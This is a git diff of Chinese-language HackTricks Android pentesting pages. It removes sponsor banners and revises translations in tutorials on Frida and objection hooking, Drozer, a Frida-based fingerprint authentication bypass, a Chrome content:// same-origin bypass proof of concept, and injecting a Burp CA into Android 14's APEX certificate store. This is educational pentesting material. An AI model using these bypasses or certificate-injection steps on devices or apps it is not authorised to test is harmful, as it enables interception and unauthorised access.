安全虚拟机,包含来自不同安全极客和研究人员的最新框架、教程和实验室,用于逆向工程和恶意软件分析。 -## 参考资料 +## 参考 - [https://owasp.org/www-project-mobile-app-security/](https://owasp.org/www-project-mobile-app-security/) - [https://appsecwiki.com/#/](https://appsecwiki.com/#/) 这是一个很好的资源列表 @@ -777,19 +736,4 @@ AndroL4b 是一个基于 ubuntu-mate 的 Android 安全虚拟机,包含来自 - [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/) - [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit) -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客见解**\ -参与深入探讨黑客的刺激和挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -及时了解最新的漏洞赏金发布和重要平台更新 - -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶级黑客开始合作吧! - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md index 025c16eb0..7b016d07a 100644 --- a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md +++ b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md @@ -2,15 +2,9 @@ {{#include ../../banners/hacktricks-training.md}} -
- -通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} - ## **方法 1 – 无加密对象使用的绕过** -这里的重点是_onAuthenticationSucceeded_回调,它在认证过程中至关重要。WithSecure的研究人员开发了一个[Frida脚本](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js),使得在_onAuthenticationSucceeded(...)_中绕过NULL_CryptoObject成为可能。该脚本在方法调用时强制自动绕过指纹认证。下面是一个简化的代码片段,演示了在Android指纹上下文中的绕过,完整应用程序可在[GitHub](https://github.com/St3v3nsS/InsecureBanking)上找到。 +这里的重点是 _onAuthenticationSucceeded_ 回调,它在认证过程中至关重要。WithSecure 的研究人员开发了一个 [Frida 脚本](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js),使得可以绕过 _onAuthenticationSucceeded(...)_ 中的 NULL _CryptoObject_。该脚本在方法调用时强制自动绕过指纹认证。下面是一个简化的代码片段,演示了在 Android 指纹上下文中的绕过,完整应用程序可在 [GitHub](https://github.com/St3v3nsS/InsecureBanking) 上获取。 ```javascript biometricPrompt = new BiometricPrompt(this, executor, new BiometricPrompt.AuthenticationCallback() { @Override @@ -56,7 +50,7 @@ frida -U -l script-to-bypass-authentication.js --no-pause -f com.generic.in 1. **反编译 APK**:将 APK 文件转换为更易读的格式(如 Java 代码)。 2. **分析代码**:查找指纹身份验证的实现,并识别潜在的弱点(如后备机制或不当的验证检查)。 -3. **重新编译 APK**:在修改代码以绕过指纹身份验证后,应用程序被重新编译、签名并安装到设备上进行测试。 +3. **重新编译 APK**:在修改代码以绕过指纹身份验证后,应用程序被重新编译、签名,并安装到设备上进行测试。 ## **方法 5 – 使用自定义身份验证工具** @@ -69,10 +63,5 @@ frida -U -l script-to-bypass-authentication.js --no-pause -f com.generic.in - [https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/](https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/) -
- -深化您在 **移动安全** 方面的专业知识,加入 8kSec 学院。通过我们的自学课程掌握 iOS 和 Android 安全,并获得认证: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/content-protocol.md b/src/mobile-pentesting/android-app-pentesting/content-protocol.md index f724b41c7..355cfe6e2 100644 --- a/src/mobile-pentesting/android-app-pentesting/content-protocol.md +++ b/src/mobile-pentesting/android-app-pentesting/content-protocol.md @@ -1,14 +1,11 @@ {{#include ../../banners/hacktricks-training.md}} -
-{% embed url="https://websec.nl/" %} - -**这是关于帖子 [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/) 的摘要** +**这是帖子 [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/) 的摘要** ### 列出媒体存储中的文件 -要列出媒体存储管理的文件,可以使用以下命令: +要列出由媒体存储管理的文件,可以使用以下命令: ```bash $ content query --uri content://media/external/file ``` @@ -44,11 +41,11 @@ content query --uri content://media/external/file --projection _id,_data | grep ``` ### Chrome CVE-2020-6516: Same-Origin-Policy Bypass -_同源策略_ (SOP) 是浏览器中的一种安全协议,限制网页与不同来源的资源进行交互,除非通过跨源资源共享 (CORS) 策略明确允许。该策略旨在防止信息泄露和跨站请求伪造。Chrome 将 `content://` 视为本地方案,这意味着更严格的 SOP 规则,其中每个本地方案 URL 被视为一个单独的来源。 +_同源策略_ (SOP) 是浏览器中的一种安全协议,限制网页与不同来源的资源交互,除非通过跨源资源共享 (CORS) 策略明确允许。该策略旨在防止信息泄露和跨站请求伪造。Chrome 将 `content://` 视为本地方案,这意味着更严格的 SOP 规则,其中每个本地方案 URL 被视为一个单独的来源。 然而,CVE-2020-6516 是 Chrome 中的一个漏洞,允许通过 `content://` URL 绕过 SOP 规则。实际上,来自 `content://` URL 的 JavaScript 代码可以访问通过 `content://` URL 加载的其他资源,这在安全上是一个重大隐患,尤其是在运行 Android 10 之前版本的 Android 设备上,因为这些版本未实现范围存储。 -下面的概念验证演示了这个漏洞,其中一个 HTML 文档在 **/sdcard** 下上传并添加到媒体库中,使用其 JavaScript 中的 `XMLHttpRequest` 访问并显示媒体库中另一个文件的内容,绕过了 SOP 规则。 +下面的概念验证演示了此漏洞,其中一个 HTML 文档在 **/sdcard** 下上传并添加到媒体库中,使用其 JavaScript 中的 `XMLHttpRequest` 访问并显示媒体库中另一个文件的内容,绕过了 SOP 规则。 Proof-of-Concept HTML: ```xml @@ -79,8 +76,4 @@ xhr.send(); ``` -
- -{% embed url="https://websec.nl/" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md index 372ad129f..e7799fcda 100644 --- a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md +++ b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md @@ -1,23 +1,19 @@ -# Drozer Tutorial +# Drozer 教程 {{#include ../../../banners/hacktricks-training.md}} - -**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! -{% embed url="https://go.intigriti.com/hacktricks" %} +## 待测试的 APK -## 待测试的APKs - -- [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (来自mrwlabs) +- [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (来自 mrwlabs) - [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz) -**本教程的部分内容摘自** [**Drozer文档pdf**](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)**。** +**本教程的部分内容摘自** [**Drozer 文档 pdf**](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)**。** ## 安装 -在您的主机上安装Drozer客户端。从[最新版本](https://github.com/mwrlabs/drozer/releases)下载。 +在您的主机上安装 Drozer 客户端。可以从 [最新版本](https://github.com/mwrlabs/drozer/releases) 下载。 ```bash pip install drozer-2.4.4-py2-none-any.whl pip install twisted @@ -100,7 +96,7 @@ Attack Surface: is debuggable ``` - **活动**: 也许你可以启动一个活动并绕过某种授权,这应该阻止你启动它。 -- **内容提供者**: 也许你可以访问私有数据或利用某些漏洞(SQL注入或路径遍历)。 +- **内容提供者**: 也许你可以访问私有数据或利用某个漏洞(SQL注入或路径遍历)。 - **服务**: - **可调试**: [了解更多](./#is-debuggeable) @@ -220,7 +216,7 @@ app.broadcast.sniff Register a broadcast receiver that can sniff particu ``` #### 发送消息 -在这个例子中,利用 [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) 内容提供者,你可以 **发送任意短信** 到任何非高级目的地 **而无需** 用户许可。 +在这个例子中,利用 [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) 内容提供者,你可以 **发送任意短信** 到任何非高级目的地 **而无需** 用户的许可。 ![](<../../../images/image (415).png>) @@ -254,10 +250,6 @@ run app.package.debuggable - [https://blog.dixitaditya.com/android-pentesting-cheatsheet/](https://blog.dixitaditya.com/android-pentesting-cheatsheet/) - -**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md index 4690bf7de..bf865ade2 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md @@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} ## 安装 @@ -27,7 +22,7 @@ frida-ps -U | grep -i #Get all the package name ``` ## 教程 -### [教程 1](frida-tutorial-1.md) +### [Tutorial 1](frida-tutorial-1.md) **来源**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ **APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\ @@ -35,25 +30,25 @@ frida-ps -U | grep -i #Get all the package name **请访问[链接阅读](frida-tutorial-1.md)。** -### [教程 2](frida-tutorial-2.md) +### [Tutorial 2](frida-tutorial-2.md) -**来源**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (第 2、3 和 4 部分)\ -**APK 和源代码**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) +**来源**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (第2、3和4部分)\ +**APKs和源代码**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) **请访问[链接阅读。](frida-tutorial-2.md)** -### [教程 3](owaspuncrackable-1.md) +### [Tutorial 3](owaspuncrackable-1.md) **来源**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk) **请访问[链接阅读](owaspuncrackable-1.md)。** -**您可以在这里找到更多精彩的 Frida 脚本:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) +**您可以在这里找到更多精彩的Frida脚本:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) ## 快速示例 -### 从命令行调用 Frida +### 从命令行调用Frida ```bash frida-ps -U @@ -110,7 +105,7 @@ send("MainActivity.onCreate() HIT!!!") var ret = this.onCreate.overload("android.os.Bundle").call(this, var_0) } ``` -钩住 Android `.onCreate()` +钩住安卓 `.onCreate()` ```javascript var activity = Java.use("android.app.Activity") activity.onCreate.overload("android.os.Bundle").implementation = function ( @@ -182,10 +177,5 @@ onComplete: function () {}, - [https://github.com/DERE-ad2001/Frida-Labs](https://github.com/DERE-ad2001/Frida-Labs) - [高级 Frida 使用博客系列的第 1 部分:IOS 加密库](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/) -
- -**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md index 2daf506bb..d35290d13 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md @@ -2,19 +2,13 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**Bug bounty tip**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} - **这是文章的摘要**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ **APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\ **源代码**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) ## Python -Frida 允许你在运行的应用程序的函数内部**插入 JavaScript 代码**。但你可以使用**python**来**调用**钩子,甚至与**钩子**进行**交互**。 +Frida 允许你在运行的应用程序的函数内部**插入 JavaScript 代码**。但是你可以使用**python**来**调用**钩子,甚至与**钩子**进行**交互**。 这是一个简单的 python 脚本,你可以与本教程中所有提出的示例一起使用: ```python @@ -61,7 +55,7 @@ python hooking.py hook1.js ### 非静态函数 -如果您想调用类的非静态函数,您**首先需要一个该类的实例**。然后,您可以使用该实例来调用该函数。\ +如果您想调用一个类的非静态函数,您**首先需要一个该类的实例**。然后,您可以使用该实例来调用该函数。\ 为此,您可以**找到一个现有的实例**并使用它: ```javascript Java.perform(function () { @@ -100,7 +94,7 @@ console.log("[ + ] Found correct PIN: " + i) ``` ## Hook 3 - 检索参数和返回值 -您可以钩住一个函数并使其**打印** **传递的参数**的值和**返回值**的值: +您可以挂钩一个函数并使其**打印**传递的**参数**的值和**返回值**的值: ```javascript //hook3.js Java.perform(function () { @@ -120,14 +114,9 @@ return encrypted_ret ``` ## 重要 -在本教程中,您使用方法名称和 _.implementation_ 钩住了方法。但是如果有 **多个同名方法**,您需要 **指定要钩住的方法**,**指明参数的类型**。 +在本教程中,您使用方法名称和 _.implementation_ 钩住了方法。但是如果有 **多个同名方法**,您需要 **指定要钩住的方法** **并指明参数类型**。 您可以在 [下一个教程](frida-tutorial-2.md) 中看到这一点。 -
- -**漏洞赏金提示**:**注册** **Intigriti**,这是一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md index 5facd8f01..c6ba22b8b 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} - **这是文章的摘要**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (第 2、3 和 4 部分)\ **APKs 和源代码**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) @@ -15,11 +9,11 @@ **原始代码的某些部分无法正常工作,并在此进行了修改。** -## Part 2 +## 第 2 部分 -在这里你可以看到一个如何**钩取两个同名但参数不同的函数**的示例。\ -此外,你将学习如何**使用自己的参数调用函数**。\ -最后,还有一个示例,展示如何**找到一个类的实例并使其调用一个函数**。 +在这里你可以看到一个如何 **hook 2 个同名但参数不同的函数** 的示例。\ +此外,你将学习如何 **使用自己的参数调用一个函数**。\ +最后,还有一个示例,展示如何 **找到一个类的实例并使其调用一个函数**。 ```javascript //s2.js console.log("Script loaded successfully "); @@ -77,11 +71,11 @@ raw_input() ``` python loader.py ``` -## 第3部分 +## Part 3 ### Python -现在您将看到如何通过Python向被hook的应用发送命令以调用函数: +现在你将看到如何通过 Python 向被 Hook 的应用发送命令以调用函数: ```python //loader.py import time @@ -112,7 +106,7 @@ script.exports.callsecretfunction() elif command == "3": script.exports.hooksecretfunction() ``` -命令 "**1**" 将 **退出**,命令 "**2**" 将查找并 **实例化类并调用私有函数** _**secret()**_,命令 "**3**" 将 **钩住** 函数 _**secret()**_ 以便它 **返回** 一个 **不同的字符串**。 +命令 "**1**" 将 **退出**,命令 "**2**" 将查找并 **实例化类并调用私有函数** _**secret()**_,命令 "**3**" 将 **钩住** 函数 _**secret()**_ 以便 **返回** 一个 **不同的字符串**。 因此,如果你调用 "**2**",你将得到 **真实的秘密**,但如果你先调用 "**3**" 然后再调用 "**2**",你将得到 **假的秘密**。 @@ -210,10 +204,5 @@ return this.setText(string_to_recv) ``` 有一个第5部分,我不打算解释,因为没有任何新内容。但如果你想阅读,可以在这里找到:[https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/) -
- -**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md index 8e72be881..fda6befa7 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md @@ -2,11 +2,7 @@ {{#include ../../../banners/hacktricks-training.md}} - -**Bug bounty tip**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} ## **介绍** @@ -34,7 +30,7 @@ pip3 install objection ``` ### 连接 -建立一个 **常规 ADB 连接** 并 **启动** 设备中的 **frida** 服务器(并检查 frida 在客户端和服务器上是否正常工作)。 +建立一个 **常规 ADB 连接** 并 **启动** 设备上的 **frida** 服务器(并检查 frida 在客户端和服务器上是否正常工作)。 如果您使用的是 **root 设备**,则需要在 _**--gadget**_ 选项中选择您想要测试的应用程序。在这种情况下: ```bash @@ -88,9 +84,9 @@ android ui FLAG_SECURE false #This may enable you to take screenshots using the ``` ### 静态分析变为动态 -在真实应用中,我们应该在使用 objection 之前了解这一部分发现的所有信息,这得益于 **静态分析**。无论如何,这种方式也许可以让你看到 **一些新东西**,因为在这里你将仅获得一个完整的类、方法和导出对象的列表。 +在真实应用中,我们应该在使用 objection 之前了解这一部分发现的所有信息,这得益于 **静态分析**。无论如何,这种方式也许可以让你看到 **一些新东西**,因为在这里你只会得到一个完整的类、方法和导出对象的列表。 -如果你以某种方式 **无法获取应用的可读源代码**,这也是有用的。 +如果你以某种方式 **无法获取应用的可读源代码**,这也是很有用的。 #### 列出活动、接收器和服务 ```bash @@ -151,9 +147,9 @@ android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --d ``` ![](<../../../images/image (1086).png>) -#### Hooking (watching) an entire class +#### 钩住(观察)整个类 -实际上,我发现 MainActivity 类的所有方法都非常有趣,让我们**全部 hook 住**。小心,这可能会**崩溃**一个应用程序。 +实际上,我发现 MainActivity 类的所有方法都非常有趣,让我们**钩住它们**。小心,这可能会**崩溃**一个应用程序。 ```bash android hooking watch class asvid.github.io.fridaapp.MainActivity --dump-args --dump-return ``` @@ -228,11 +224,3 @@ exit - 钩子方法有时会导致应用程序崩溃(这也是因为 Frida)。 - 你不能使用类的实例来调用实例的函数。你也不能创建类的新实例并使用它们来调用函数。 - 没有快捷方式(像 sslpinnin 那样)来钩住应用程序使用的所有常见加密方法,以查看加密文本、明文、密钥、IV 和使用的算法。 - - - -**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} - -{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md index fe349e993..7a6f96c0c 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md @@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} --- @@ -17,7 +12,7 @@ 基于 [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) -**Hook \_exit()**\_ 函数和 **decrypt function**,以便在您按下验证时在 frida 控制台中打印标志: +**Hook \_exit()**\_ 函数和 **decrypt function**,以便在你按下验证时在 frida 控制台中打印标志: ```javascript Java.perform(function () { send("Starting hooks OWASP uncrackable1...") @@ -120,10 +115,4 @@ return false send("Hooks installed.") }) ``` -
- -**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md index e95257801..37309f3fc 100644 --- a/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md +++ b/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md @@ -2,9 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## 在虚拟机上 @@ -12,8 +9,8 @@ ![](<../../images/image (367).png>) -**以 Der 格式导出证书**,然后让我们**转换**它为**Android**能够**理解**的格式。请注意,**为了在 AVD 的 Android 机器上配置 Burp 证书**,您需要**使用** **`-writable-system`** 选项运行此机器。\ -例如,您可以这样运行它: +**以 Der 格式导出证书**,然后让我们**转换**它为 **Android** 能够**理解**的形式。请注意,**为了在 AVD 的 Android 机器上配置 burp 证书**,您需要**使用** **`-writable-system`** 选项运行此机器。\ +例如,您可以这样运行: ```bash C:\Users\\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -http-proxy 192.168.1.12:8080 -writable-system ``` @@ -40,27 +37,27 @@ adb reboot #Now, reboot the machine
-- 检查证书是否正确存储,转到 `Trusted credentials` -> `USER` +- 检查证书是否正确存储,前往 `Trusted credentials` -> `USER`
-2. **使其系统信任**:下载 Magisc 模块 [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts)(一个 .zip 文件),**拖放到**手机中,转到手机中的**Magics 应用**的**`Modules`**部分,点击**`Install from storage`**,选择 `.zip` 模块,安装完成后**重启**手机: +2. **使其系统信任**:下载 Magisc 模块 [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts)(一个 .zip 文件),**拖放到**手机中,前往手机中的**Magics 应用**的**`Modules`**部分,点击**`Install from storage`**,选择 `.zip` 模块,安装完成后**重启**手机:
-- 重启后,转到 `Trusted credentials` -> `SYSTEM`,检查 Postswigger 证书是否存在 +- 重启后,前往 `Trusted credentials` -> `SYSTEM`,检查 Postswigger 证书是否存在
## Android 14 后 -在最新的 Android 14 版本中,系统信任的证书颁发机构(CA)证书的处理方式发生了重大变化。以前,这些证书存放在**`/system/etc/security/cacerts/`**,可以被具有 root 权限的用户访问和修改,从而允许在系统中立即应用。然而,在 Android 14 中,存储位置已移至**`/apex/com.android.conscrypt/cacerts`**,这是**`/apex`**路径下的一个目录,天生是不可变的。 +在最新的 Android 14 版本中,系统信任的证书颁发机构(CA)证书的处理方式发生了重大变化。以前,这些证书存放在 **`/system/etc/security/cacerts/`**,可以被具有 root 权限的用户访问和修改,从而允许在系统中立即应用。然而,在 Android 14 中,存储位置已移至 **`/apex/com.android.conscrypt/cacerts`**,这是 **`/apex`** 路径中的一个目录,天生是不可变的。 -尝试将**APEX cacerts 路径**重新挂载为可写时会失败,因为系统不允许此类操作。即使尝试卸载或用临时文件系统(tmpfs)覆盖该目录也无法规避不可变性;应用程序继续访问原始证书数据,无论文件系统级别的更改如何。这种韧性是由于**`/apex`**挂载配置为 PRIVATE 传播,确保在**`/apex`**目录中的任何修改不会影响其他进程。 +尝试将 **APEX cacerts 路径**重新挂载为可写时会失败,因为系统不允许此类操作。即使尝试卸载或用临时文件系统(tmpfs)覆盖该目录也无法规避不可变性;应用程序继续访问原始证书数据,无论文件系统级别的更改如何。这种韧性是由于 **`/apex`** 挂载配置为 PRIVATE 传播,确保 **`/apex`** 目录中的任何修改不会影响其他进程。 -Android 的初始化涉及 `init` 进程,该进程在启动操作系统时,也会启动 Zygote 进程。该进程负责以新的挂载命名空间启动应用程序进程,其中包括一个私有的**`/apex`**挂载,从而将对该目录的更改与其他进程隔离。 +Android 的初始化涉及 `init` 进程,该进程在启动操作系统时还会启动 Zygote 进程。该进程负责以新的挂载命名空间启动应用程序进程,其中包括一个私有的 **`/apex`** 挂载,从而将对该目录的更改与其他进程隔离。 -然而,对于需要修改**`/apex`**目录中系统信任的 CA 证书的人来说,存在一种解决方法。这涉及手动重新挂载**`/apex`**以移除 PRIVATE 传播,从而使其可写。该过程包括将**`/apex/com.android.conscrypt`**的内容复制到另一个位置,卸载**`/apex/com.android.conscrypt`**目录以消除只读约束,然后将内容恢复到**`/apex`**中的原始位置。此方法需要迅速行动以避免系统崩溃。为了确保这些更改在系统范围内生效,建议重启 `system_server`,这有效地重启所有应用程序并使系统恢复到一致状态。 +然而,对于需要修改 **`/apex`** 目录中系统信任的 CA 证书的人来说,存在一种解决方法。这涉及手动重新挂载 **`/apex`** 以去除 PRIVATE 传播,从而使其可写。该过程包括将 **`/apex/com.android.conscrypt`** 的内容复制到另一个位置,卸载 **`/apex/com.android.conscrypt`** 目录以消除只读约束,然后将内容恢复到 **`/apex`** 中的原始位置。此方法需要迅速行动以避免系统崩溃。为了确保这些更改在系统范围内生效,建议重启 `system_server`,这有效地重启所有应用程序并使系统恢复到一致状态。 ```bash # Create a separate temp directory, to hold the current certificates # Otherwise, when we add the mount we can't read the current certs anymore. @@ -125,13 +122,13 @@ echo "System certificate injected" mount -t tmpfs tmpfs /system/etc/security/cacerts ``` 2. **准备 CA 证书**:在设置可写目录后,应该将打算使用的 CA 证书复制到该目录中。这可能涉及从 `/apex/com.android.conscrypt/cacerts/` 复制默认证书。必须相应地调整这些证书的权限和 SELinux 标签。 -3. **为 Zygote 绑定挂载**:利用 `nsenter`,进入 Zygote 的挂载命名空间。Zygote 作为负责启动 Android 应用程序的进程,需要此步骤以确保所有随后启动的应用程序使用新配置的 CA 证书。使用的命令是: +3. **为 Zygote 绑定挂载**:使用 `nsenter`,进入 Zygote 的挂载命名空间。Zygote 是负责启动 Android 应用程序的进程,此步骤是确保所有随后启动的应用程序使用新配置的 CA 证书。使用的命令是: ```bash nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts ``` 这确保每个新启动的应用程序将遵循更新的 CA 证书设置。 -4. **将更改应用于正在运行的应用程序**:要将更改应用于已经运行的应用程序,再次使用 `nsenter` 进入每个应用的命名空间,并执行类似的绑定挂载。必要的命令是: +4. 